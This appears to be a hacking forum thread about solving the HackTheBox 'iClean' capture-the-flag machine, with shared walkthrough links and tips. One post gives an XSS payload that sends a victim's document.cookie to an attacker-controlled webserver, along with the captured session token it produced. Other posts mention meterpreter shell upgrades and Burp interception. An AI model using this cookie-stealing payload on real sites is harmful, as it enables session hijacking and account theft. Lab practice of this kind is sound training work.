[asdfmonster]

Mine did that too, try to upgrade your shell by using meterpreter.

[ghostess256]

No hustle here is a fully detailed walkthrough on how to pwn iClean Medium Linux Machine
https://medium.com/@Null0X0/iclean-hackt...eab6312558

[b0bl0bl4ww]

Try with this payload -->

service=<img src=x onerror=this.src="http://YOUR-WEBSERVER-IP:YOUR-WEBSERVER-PORT/cookie.php?c="+document.cookie;>
URL ENCODE IT

it returns session in cleartext:

"GET /cookie.php?c=session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhLNew.4U0O4zKiKVJkXLWSwqYZkwUMepo HTTP/1.1" 404 -

Does anyone know if there is any reason why the first poster in this thread used btoa() to base64 encode the document.cookie instead of accessing it directly?
It seemed to work both ways for me.

[xbox142]

How we can find the qr_link parameter from qrgenerator endpoint?

[WhiteDevil26]

No hustle here is a fully detailed walkthrough on how to pwn iClean Medium Linux Machine
https://medium.com/@Null0X0/iclean-hackt...eab6312558

This writeup did helped. For the root file, we can directly take the file just like you mentioned and get the contents of root file without going for root ssh.

[cyberpunk123]

Did HTB patched QRgenerator vulnerability ?, I cant seem to access it. Anyone facing the same issue

---

nevermind accessed it

Did HTB patched QRgenerator vulnerability ?, I cant seem to access it. Anyone facing the same issue

[b0bl0bl4ww]

How we can find the qr_link parameter from qrgenerator endpoint?

Intercept the request to /QRGenerator with Burp suite and look at the bottom where the data fields are.

[xbox142]

Thank you very much...

[iam_with_you11]

Video walkthrough for IClean https://youtu.be/r0gEQhqK2OA

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[0xff_anonymous]

been wondering around for credits